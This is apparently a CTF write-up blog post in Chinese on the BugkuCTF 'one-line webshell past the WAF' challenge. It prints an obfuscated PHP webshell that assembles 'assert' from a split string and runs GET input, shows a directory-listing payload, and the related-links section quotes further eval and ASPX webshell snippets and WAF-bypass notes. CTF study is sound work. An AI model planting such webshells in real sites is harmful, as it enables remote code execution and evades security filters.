BugkuCTF 过狗一句话

最新推荐文章于 2024-05-30 16:21:29 发布
最新推荐文章于 2024-05-30 16:21:29 发布
阅读量526 收藏
点赞数
分类专栏: BugkuCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44481102/article/details/90212503
版权

在这里插入图片描述
点开链接没有任何内容,源代码也是
在这里插入图片描述
后台扫描也无果
回到提示

<?php 
	$poc="a#s#s#e#r#t"; 
	$poc_1=explode("#",$poc); 
	$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
	$poc_2($_GET['s']) 
?>

explode() 函数把字符串打散为数组

<?php
	$poc="a#s#s#e#r#t"; 
	$poc_1=explode("#",$poc); 
	print_r($poc_1);
?>
运行结果:
Array([0] => a	[1] => s	[2] => s	[3] => e	[4] => r	[5] => t)

最后得到的就是 assert($_GET[‘s’])

类似于 eval($_POST[‘s’])的一句话木马
即可以用s来执行命令 扫下目录 ?s=print_r(scandir(’./’))
在这里插入图片描述
还是没有找到文件 去看了下别人的wp 发现到这一步就可以出flag了 可能是出题人删了吧

3tu6b0rn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku的题目
weixin_44237647的博客
04-19 1650
矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 题目要求输入的 不是一个数字或者数字字符串,但是值为1 可以采用 %00截断 知识点是 弱类型比较 当数字与字符串比较或者运算时,会把字符串转换为数字。 https://www.cnblogs.com/Mr...
bugkuctf web基础部分 writeup
river
03-20 2834
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
论一句过WAF
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-07 1844
一.绕过方式 木马存在敏感字符被拦截 木马代码存在敏感字符,直接被waf。如:如直接传&lt;?php @@eval($_POST['123']); ?&gt;,由于存在eval危险函数直接被拦截。 这时候需要对被waf的危险字符进行各种变形即可 收集的过马,最大同性交友网站github也有很多webshell项目 $poc = "a#s#s#e#r#t"; $poc_1 = e......
关于PHP的webshell免杀小结
2401_84488651的博客
05-30 883
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!
BUGkuCTF
bigbigworld666的博客
06-26 1358
BUGkuCTF (一)WEB (1)web2 进入环境,首先看源码,在里面直接找到flag [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-97sg5F09-1593143273882)(file:///C:/Users/HP/AppData/Local/Temp/msohtmlclip1/01/clip_image002.gif)] (2)计算器 首先输入数字发现只能输入1个,所以F12去修改源码,将maxlength修改,然后填入正确数字即可出现flag [外链图片转存失
2020.3.23 bugku(21-25)
DSR446的博客
03-24 612
21. 我们看到响应头中flag字段对应字符串“6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT0RVME16ZzA=”,字符串以“=”结尾,很自然联想到可能是base64编码。base64解码为:“跑的还不错,给你flag吧: ODU0Mzg0” 3,我们看到base64解码后的中的字符串“ODU0Mzg0”是8位,不仅8位还看着怪怪的,再次base64...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入和sqlmap的入门操作,...
bypasswaf:关于安全和云锁的自动化绕过脚本
03-20
旁通 为避免非法用途而进行的学习 2.0:增加优化了部分规则现在bypass云锁篡改及bypass安全篡改支持所有的注入类型了!更新了bypass安全任意文件上传的方法(适用于业务系统存在的任何文件上传碎片但服务器安装了安全环境)更新了bypass安全SQL注入篡改,现在支持所有类型的注入了 针对最新版云锁和安全的sqlmap自动化绕过脚本 包含:绕过安全sql注入篡改绕过云锁SQL注入篡改(可0警告绕过云锁)理论上来说规则越多速度也会越慢所以不追求隐蔽性的可以按需求修改规则 针对最新版安全的任意文件上传bypass safedog_upload_yichu.txt safedog_upload_huanhang.txt 利用知识点: 安全:内联注释博客: : 云锁:引号包裹注释符绕过检测博客: : 云锁:多行注释符嵌入#绕过检测博客: : 文件上传:Conten
怎么过安全
08-28
请勿用于任何非法用途,谢谢合作. 2013年唯一一款可以完美过安全,护卫神,D盾,safe3 Waf,KOasp木马查杀等IIS防火墙和查杀工 具的WEBSHELL. 秒杀全球杀毒软件,秒杀全球防火墙.不多做解释,尽在 RedHatWebshell... 大马不带密码,小马密码admin,自带循环目录扫描功能. 官方网站: http://aspmuma.net
绕过D盾,D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
经典的 Aspx一句木马使用
tuo9999的专栏
07-12 1675
1. 相当于 ASP 一句木马 : 顺序代码 alter databas pub set RECOVERY FULL-- creat tabl pubs.dbo.cmd a imag backup log pub to disk = 'c:/TM' with init fals ;ow.Writ Request.Params["l"] ;ow.Clos %> ' insert into pubs.dbo.cmd a valu '<%System.IO.StreamWrit
Aspx 一句木马和客户端(备用)
eldn__的专栏
04-18 1634
以下是引用片段: 这个一句不用说了!我之前已经发表文章讲解过! client端HTML页面代码如下 以下是引用片段: I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320 body,td{font-size: 12px;} table{T:expression(this.border='1',this.borderColorLigh
ashx后门
10-26 1224
一、标准ASPX一句木马 .NET平台下的一句木马则百年不变,最常见的当属下面这句 <%@ Page Language=”Jscript”%><%eval(Request.Item[“pass”],”unsafe”);%> 想必这句已经成大多数防御产品的标准样本,除此以外还有上传文件的一句,像这种的从严格意义上不能算是一句木...
CTF之Bugku welcome to bugkuctf
weixin_41607190的博客
08-06 410
这道题又拖了好几天- -,各位不要学我。。。 日常抓包 抓到后在proxy中,点击右键发送到这里。 点击Go 分析一波,user、file、pass都是GET方式获取 然后读取的user的内容要和“welcome to bugkuctf”相同 include()是动态获取文件名,也就是这个文件名是hint.php 接着我们要让user的值和我们预想的一样,那就要我们手动传值了 这里用到的是php...
字符?正则?bugku(正则表达式学习)
hhh
09-05 2357
题目 通过读代码可以看出只要我们构造出符合正则表达式的字符串通过GET传参传过去就可以看到 key 即 flag 通过这道题看了很多正则表达式的语法规则…… --------------------------------------------------------------------------------------------------------------------...
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值